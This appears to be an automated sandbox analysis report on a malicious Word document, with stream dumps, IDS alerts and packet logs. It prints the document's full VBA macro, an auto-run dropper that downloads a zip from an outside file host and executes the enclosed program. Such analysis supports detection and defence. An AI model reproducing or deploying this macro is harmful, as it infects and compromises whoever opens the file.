                                                                                    Number of Characters:238
                                                                                    Creating Application:Microsoft Office Word
                                                                                    Security:0
                                                                                    Document Summary
                                                                                    Document Code Page:1252
                                                                                    Number of Lines:1
                                                                                    Number of Paragraphs:1
                                                                                    Thumbnail Scaling Desired:False
                                                                                    Company:
                                                                                    Contains Dirty Links:False
                                                                                    Shared Document:False
                                                                                    Changed Hyperlinks:False
                                                                                    Application Version:1048576

                                                                                    Streams with VBA

                                                                                    VBA File Name: ThisDocument.cls, Stream Size: 6958
                                                                                    General
                                                                                    Stream Path:Macros/VBA/ThisDocument
                                                                                    VBA File Name:ThisDocument.cls
                                                                                    Stream Size:6958
                                                                                    Data ASCII:. . . . . . . . . ^ . . . . . . r . . . 3 . . . A . . . A . . . . . . . . . . . { J ( . . . . . . . . . . . . . . . . . . . < . . . ~ . . i . I T . 6 - R S > D ) . $ p . . . . . . . . . . . . . . . . . . . . ' , . J . . V . . . . . . . . . . . . . . . . . . . . . . . x . . . . ' , . J . . V . ~ . . i . I T . 6 - . . . . M E . . . . . . . . . . . . . . . . . . . . . 4 . . . . . . . . . . S " . . . . S . . . . . S " . . . . ) . . . . . . ) L . . . . . . > " . . . . . L . . . . . P . . . . . . . . . . . . . .
                                                                                    Data Raw:01 16 01 00 06 00 01 00 00 5e 0f 00 00 e4 00 00 00 72 02 00 00 33 10 00 00 41 10 00 00 41 17 00 00 00 00 00 00 01 00 00 00 7b 4a f8 28 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 ae 7e 18 00 69 9d 18 49 ad 54 e8 96 9f c8 36 2d 52 98 bc ce c4 53 3e 44 ac fd 29 05 93 cc 24 70 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    VBA Code
                                                                                    Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub downloadFile(url As String, fileOutPath As String)
    Dim WinHttpReq As Object, oStream As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", url, False
    WinHttpReq.Send
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile fileOutPath, 2
        oStream.Close
    End If
End Sub
Sub Unzip(dirr As String)
    Dim sh As Shell32.Shell
    Dim sf As Shell32.Folder
    Dim df As Shell32.Folder
    Set sh = New Shell32.Shell
    Set df = sh.NameSpace(dirr)
    '
    Set sf = sh.NameSpace(dirr & "b5uubc.zip")
    df.CopyHere sf.Items
End Sub
Function GenerateRandomValue() As String
    Dim randomNum As String
    Randomize
    randomNum = Trim(Str(Int((10000000 - 11 + 1) * Rnd + lowerbound)))
    GenerateRandomValue = randomNum
End Function
Sub DownloadUnzipAndRun()
    Dim url As String
    Dim savePath As String
    Dim ShellApp As Object
    Dim rundomnum As String
    Dim dirr As String
    '
    '
    url = "https://files.catbox.moe/b5uubc.zip"
    rundomnum = GenerateRandomValue
    dirr = "C:\" & rundomnum & "\"
    MkDir dirr
    
    savePath = dirr & "b5uubc.zip"
    downloadFile url, savePath
    Unzip dirr
    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")
    
    objShell.Run dirr & "\vhcst.exe"
    Set WinHttpReq = Nothing
    Set oStream = Nothing
    Set ShellApp = Nothing
    Set objShell = Nothing
End Sub
Sub Document_Open()
DownloadUnzipAndRun
End Sub
Sub AutoOpen()
DownloadUnzipAndRun
End Sub

                                                                                    Streams

                                                                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                    General
                                                                                    Stream Path:\x1CompObj
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:114
                                                                                    Entropy:4.235956365095031
                                                                                    Base64 Encoded:True
                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                    General
                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:4096
                                                                                    Entropy:0.24447178951845344
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                    General
                                                                                    Stream Path:\x5SummaryInformation
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:4096
                                                                                    Entropy:0.4500704941337318
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U S E R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f8 00 00 00
                                                                                    Stream Path: 1Table, File Type: data, Stream Size: 7353
                                                                                    General
                                                                                    Stream Path:1Table
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:7353
                                                                                    Entropy:5.846992815076891
                                                                                    Base64 Encoded:True
                                                                                    Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                                                                                    Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                    Stream Path: Data, File Type: dBase III DBT, version number 0, next free block index 1189, 1st item "?\350\275\346`\332\276\327\232\355\245\226\2257\260\037Y_I\260n\212]v\001\370\001\251H\262%\224Xe)\0064\332\023\376k\222yq\035\251", Stream Size: 4096
                                                                                    General
                                                                                    Stream Path:Data
                                                                                    CLSID:
                                                                                    File Type:dBase III DBT, version number 0, next free block index 1189, 1st item "?\350\275\346`\332\276\327\232\355\245\226\2257\260\037Y_I\260n\212]v\001\370\001\251H\262%\224Xe)\0064\332\023\376k\222yq\035\251"
                                                                                    Stream Size:4096
                                                                                    Entropy:5.704530575402523
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:. . . D . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . 3 . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . G p < S X f e H G . . . . . . . . D . . . . . . . . n . . . . G p < S X f e H G P N G . . . . . . . . I H D R . . . . . . . . . . . . . / { . . . . s R G B . . . . . . p H Y s . . . . . . . . 3 { . . . I D A T H K [ L P . . 2 . . . @ P . . D . . > B . . .
                                                                                    Data Raw:a5 04 00 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 01 86 01 90 01 9f 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 36 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 33 00 0b f0 12 00 00 00 04 41 01 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 00 00 10 f0 04 00 00 00 00 00
                                                                                    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 372
                                                                                    General
                                                                                    Stream Path:Macros/PROJECT
                                                                                    CLSID:
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Stream Size:372
                                                                                    Entropy:5.338091216006702
                                                                                    Base64 Encoded:True
                                                                                    Data ASCII:I D = " { 3 9 7 3 5 8 B C - 5 2 B 6 - 4 C F B - A C 7 5 - 1 6 D 5 6 B 9 4 0 0 1 D } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 8 6 A B 4 4 2 B 8 4 2 B 8 4 2 B 8 4 2 B 8 " . . D P B = " 1 3 1 1 C F 4 6 7 B 4 7 7 B 4 7 7 B " . . G C = " B E B C 6 2 3 3 A 6 7 5 5 0 7 6 5 0 7 6 A F " . . . . [ H o s t E x t e n d e r I n f o ] . .
                                                                                    Data Raw:49 44 3d 22 7b 33 39 37 33 35 38 42 43 2d 35 32 42 36 2d 34 43 46 42 2d 41 43 37 35 2d 31 36 44 35 36 42 39 34 30 30 31 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                                                    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41
                                                                                    General
                                                                                    Stream Path:Macros/PROJECTwm
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:41
                                                                                    Entropy:3.0773844850752607
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                                                    Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                                                    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3415
                                                                                    General
                                                                                    Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:3415
                                                                                    Entropy:4.536013370648086
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ .
                                                                                    Data Raw:cc 61 af 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                    Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 2275
                                                                                    General
                                                                                    Stream Path:Macros/VBA/__SRP_0
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:2275
                                                                                    Entropy:4.420927839399666
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 J . C A R . . . . . . . . . . . . . . . . . . . . . . e . . . . . . . . . ) . . . . . . . . . Y . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                    Data Raw:93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 02 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00
                                                                                    Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 144
                                                                                    General
                                                                                    Stream Path:Macros/VBA/__SRP_1
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:144
                                                                                    Entropy:2.9334168400073426
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:r U . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u r l . . . . . . . . f i l e O u t P a t h . . . . . . . . d i r r g . . . . . . .
                                                                                    Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 03 00 00 09 f9 02 00 00 00 00 00 00 11 07 00 00 00 00 00 00 08 00 00 00 00 00 01 00 01 00 00 08 03 00 00 00 75 72 6c 03 00 00 08 0b 00 00 00 66 69 6c 65 4f 75 74 50 61 74 68 02 00 00 08
                                                                                    Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 1660
                                                                                    General
                                                                                    Stream Path:Macros/VBA/__SRP_2
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:1660
                                                                                    Entropy:3.993875781818988
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . ! . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y . . . . . . . . . . . . . . A . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . q . . . . . . . . . . . . . . . . . . . . . 9 . . . .
                                                                                    Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 06 00 06 00 1d 00 00 00 e9 06 00 00 00 00 00 00 49 08 00 00 00 00 00 00 e9 08 00 00 00 00 00 00 09 09 00 00 00 00 00 00 39 0a 00 00 00 00 00 00 21 09 00 00 00 00 00 00 a9 09 00 00 00 00 00 00 61 09 00 00 00 00 00 00 a9 0a 00 00 00 00
                                                                                    Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 320
                                                                                    General
                                                                                    Stream Path:Macros/VBA/__SRP_3
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:320
                                                                                    Entropy:2.6524913771886793
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . , . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 0 ( . A . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . 0 ( . . . . . . . . . . . ` . . . . . . . . . . . . . 0 $ . . . . . . . . . . . ` . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . $ . A . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . n . . . . . . .
                                                                                    Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 2c 00 01 01 00 00 00 00 02 00 00 00 04 60 08 00 05 07 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 81 00 00 00 00 00 01 00 91 00 00 00 00 00 01 00 00 00 00 00 1e 30 30 28 00 41 01 00 00 00 00 02 00 01 00 04 60 04 00 09 07 ff ff ff
                                                                                    Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 634
                                                                                    General
                                                                                    Stream Path:Macros/VBA/dir
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:634
                                                                                    Entropy:6.335121969528701
                                                                                    Base64 Encoded:True
                                                                                    Data ASCII:. v . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . [ Q i . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * . \\ C . . . . f . a . . . ! O f f i c . g O . f . i . c
                                                                                    Data Raw:01 76 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 b8 5b 51 69 0d 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                                                    Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                                                                    General
                                                                                    Stream Path:WordDocument
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:4096
                                                                                    Entropy:1.9543088260908765
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:. U . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j n n . . . . . . . . . . . . . . . . . . . . . . . . . . . a . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . .
                                                                                    Data Raw:ec a5 c1 00 55 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 17 09 00 00 0e 00 62 6a 62 6a eb 6e eb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 89 04 e9 61 89 04 e9 61 17 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-11-26T04:19:31.441150+01002827578ETPRO MALWARE Likely Dropper Doc GET to .moe TLD1192.168.2.449735108.181.20.35443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 26, 2024 04:19:28.905323029 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:28.905353069 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:28.905428886 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:28.906112909 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:28.906126976 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:30.677912951 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:30.678132057 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:30.681885004 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:30.681904078 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:30.682111979 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:30.683423042 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:30.684668064 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:30.727333069 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.441189051 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.441214085 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.441236019 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.441247940 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.441265106 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.441307068 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.441365957 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.487833977 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.487849951 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.487936020 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.487957954 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.488065004 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.633162975 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.633178949 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.633250952 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.633264065 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.633347034 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.675153971 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.675168037 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.675232887 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.675242901 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.675283909 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.710324049 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.710342884 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.710407019 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.710416079 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.710470915 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.716064930 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.716116905 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.716121912 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.716149092 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.716172934 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.716223001 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.716250896 CET44349735108.181.20.35192.168.2.4
                                                                                    Nov 26, 2024 04:19:31.716260910 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:31.716342926 CET49735443192.168.2.4108.181.20.35
                                                                                    Nov 26, 2024 04:19:49.641916990 CET4980380192.168.2.4208.95.112.1
                                                                                    Nov 26, 2024 04:19:49.761914015 CET8049803208.95.112.1192.168.2.4
                                                                                    Nov 26, 2024 04:19:49.762006998 CET4980380192.168.2.4208.95.112.1
                                                                                    Nov 26, 2024 04:19:49.765615940 CET4980380192.168.2.4208.95.112.1
                                                                                    Nov 26, 2024 04:19:49.885731936 CET8049803208.95.112.1192.168.2.4
                                                                                    Nov 26, 2024 04:19:50.923795938 CET8049803208.95.112.1192.168.2.4
                                                                                    Nov 26, 2024 04:19:50.934622049 CET4980380192.168.2.4208.95.112.1
                                                                                    Nov 26, 2024 04:19:51.054938078 CET8049803208.95.112.1192.168.2.4
                                                                                    Nov 26, 2024 04:19:51.055031061 CET4980380192.168.2.4208.95.112.1
                                                                                    Nov 26, 2024 04:20:14.383477926 CET49809443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:14.383512974 CET44349809162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:14.383591890 CET49809443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:14.384107113 CET49809443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:14.384118080 CET44349809162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:15.644884109 CET44349809162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:15.645000935 CET49809443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:15.647237062 CET49809443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:15.647243977 CET44349809162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:15.647452116 CET44349809162.159.136.232192.168.2.4
